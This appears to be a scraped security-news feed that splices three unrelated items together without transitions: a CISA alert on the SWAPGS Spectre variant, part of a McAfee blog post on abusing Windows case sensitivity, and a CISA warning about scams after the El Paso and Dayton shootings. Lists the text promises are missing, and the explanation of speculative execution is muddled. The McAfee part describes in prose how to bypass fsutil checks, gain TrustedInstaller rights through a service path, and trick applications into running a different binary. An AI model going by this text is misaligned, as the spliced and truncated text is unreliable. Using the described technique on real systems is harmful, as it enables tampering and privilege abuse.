The Cybersecurity and Infrastructure Security Agency (CISA) is aware of a vulnerability (CVE-2019-1125) known as SWAPGS, which is a variant of Spectre Variant 1—that affects modern computer processors. This vulnerability can be exploited to steal sensitive data present in a computer systems' memory.
Spectre is a flaw an attacker can exploit to force a program to reveal its data. The name derives from "speculative execution"—an optimization method a computer system performs to check whether it will work to prevent a delay when actually executed. Spectre affects almost all devices including desktops, laptops, and cloud servers.
CISA encourages users and administrators to review the following guidance, refer to their hardware and software vendors for additional details, and apply an appropriate patch when available:
In the first of this 3-part blog series, we covered the implications of promoting files to “Evil Twins” where they can be created and remain in the system as different entities once case sensitiveness is enabled.
In this 2nd post we try to abuse applications that do not work well with CS changes, abusing years of “normalization” assumptions.
It is worth noting that the impact of this change will vary depending on the target folder.
Out of the box, Windows provides a tool to change CS information by invoking the underlying API NtSetFileInformation with FILE_CASE_SENSITIVE_INFORMATION flags.
This tool contains several checks at user-mode level to restrict the target folder but, as usual, it can be easily bypassed using different path combinations. It is possible to create a tool or invoke the API from PowerShell to remove these checks.
Let us go over the following scenarios:
Changing ROOT drive CS:
fsutil restrictions will be bypassed and most of the console will not work unless you specify full paths (mostly due to environment variables broken on case-sensitiveness).
For some folders is not enough to be Administrator, but to have other type of ACL’s instead.
TrustedInstaller has the required permissions to do so and… you just need Admin permissions to change the service path:
If you change Windows folder case sensitiveness by using the same technique, Windows will not boot anymore.
These scenarios introduce new unexpected behaviors in the current applications, like for instance:
There is a folder with CS enabled and two directories with the same name, different case.
Trying to change CS will fail due to “multiple files/folders with the same name already exists” check.
Move to recycle bin on one of the folders.
Change CS of the folder.
Restore the deleted file.
The contents of the deleted file overwrite the one originally kept.
Left: Root drive with case sensitive enabled.
Right: Program Files CS changed thanks to Trusted Installer ACL. If an application is not considering the proper case, next time it tries to execute a binary whose name may be normalized (to uppercase) it can spawn a different app.
Watch the video recorded by our expert Cedric Cochin illustrating this technique:
Protection and Detection with McAfee Products
Products that rely on SysCore will protect C:\ from case sensitive changes
In the wake of the recent shootings in El Paso, TX, and Dayton, OH, the Cybersecurity and Infrastructure Security Agency (CISA) advises users to watch out for possible malicious cyber activity seeking to capitalize on these tragic events. Users should exercise caution in handling emails related to the shootings, even if they appear to originate from trusted sources. Fraudulent emails often contain links or attachments that direct users to phishing or malware-infected websites. Emails requesting donations from duplicitous charitable organizations are also common after tragic events. Be wary of fraudulent social media pleas, calls, texts, donation websites, and door-to-door solicitations relating to these events.
To avoid becoming a victim of malicious activity, users and administrators should consider taking the following preventive measures: